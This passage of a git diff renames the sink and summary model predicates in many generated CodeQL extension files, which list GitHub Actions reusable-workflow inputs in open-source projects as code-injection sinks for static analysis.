"input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index efa591f749d..3583052045b 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 4bd74701fde..f355ceee6da 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 34d11e19946..2b9190c87af 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index fb4a8248853..783ff3c0468 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index ef3af44da3a..de853d30588 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index a8c86c49d7c..31f09278ecd 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 40549844d38..d45a2e2a03a 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index bd180d9b367..896400bf2f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 1e5721f1e7c..ade06c90c26 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index b7a14240aed..f4c2d488ba3 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 1a276f8812f..8a11ced42d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index ef448c8f4c0..4c018b20f22 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 6c672170025..315c85efeb6 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index b7104a8b615..8a3132d5258 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index cd81a723906..9a669c8c009 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 1b2ce37480f..0ecb817822c 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 91889927c45..e4590eeec8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 8d4400bd3ea..ea0ddad0697 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 29c7e1bd3e2..9352f766e82 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 109dce9df0d..d436644f4ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index e3643f0156b..c6c01abca90 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index a4bba59b5a5..8a9f76e7e52 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index d12982c35a4..8b3cfebc67b 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index deb10e5e4b4..9add4859f35 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5c22f0ffcb7..efc8097b963 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 790e94c2aac..6a305522cfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index fedb21393bc..441325c76a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index f60fffb206e..5f0831afc07 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index c7fe932aba2..afd7aabc1fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index d47aea3363f..49e556f585f 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index f32acf5038e..24585aa50ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index c739b5750cc..afc7af28f9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 7ac3c0fb530..5b3d91a8a7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index c641035f966..b43253eb619 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index adea8ae4bd2..89559cf57e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 857c946e2b7..6292841e56a 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 717022ea6e8..9f98fd51139 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 7dadb99209d..e04605511b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index ca3cb0091e9..a77181e6c4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6faf8b90057..6c90e29a43b 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 39b6773a2b1..6bacbc181da 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index cbbce950b41..83d438d4e3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 48206551bcd..703a766cb4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 256ad3f0e04..ecb4c809efe 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ 